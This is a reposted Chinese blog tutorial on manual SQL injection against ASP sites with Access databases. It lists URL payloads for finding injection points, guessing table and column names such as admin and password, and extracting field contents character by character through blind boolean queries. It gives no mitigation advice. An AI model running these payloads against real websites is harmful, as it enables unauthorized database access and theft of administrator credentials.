SQL注入原理 手工注入access数据库
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了SQL注入原理 手工注入access数据库,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含1201字,纯文字阅读大概需要2分钟。
内容图文
![SQL注入原理 手工注入access数据库](/upload/InfoBanner/zyjiaocheng/481/8cd5d14231ad4753ba70232199daafbc.jpg)
SQL注入是通过将SQL命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意SQL指令的目的。
1.判断网站是否有注入点。
在以asp?id=xx(任意数字)结尾的连接依次添加:
-
‘
-
1=1
-
1=2
若以上结果显示"数据库出错","正常显示","数据库出错"则该网站存在注入点。
2.猜解表名
在链接末尾添加语句:
and exists(select * from admin)
若存在表名为admin的表,则上述式返回true,即页面正常显示。
3.猜解列名
在链接末尾添加语句:
and exists(select admin from admin)
若admin表中存在名为admin的列,则上述式返回true,即页面正常显示。
同理,检测表中是否存在名为password的列。
4.猜测字段内容
- 首先猜测字段长度,在链接末尾添加语句:
and (select top 1 len(admin) from admin)>n
若页面正常显示,则字段长度大于n。
- 用同样的方法,猜测第一条记录的第一个字符,在链接末尾添加语句:
and (select top 1 asc(mid(admin,1,1)) from admin)>c
若页面正常显示,则第一条记录的第一个字符的ASCII码大于c。
- 同理,可以用二分法快速求得admin字段内容和password字段内容。
SQL注入原理 手工注入access数据库
标签:code sql注入 blog 注入 access from font 命令 div
本文系统来源:http://www.cnblogs.com/barrier/p/6794411.html
内容总结
以上是互联网集市为您收集整理的SQL注入原理 手工注入access数据库全部内容,希望文章能够帮你解决SQL注入原理 手工注入access数据库所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。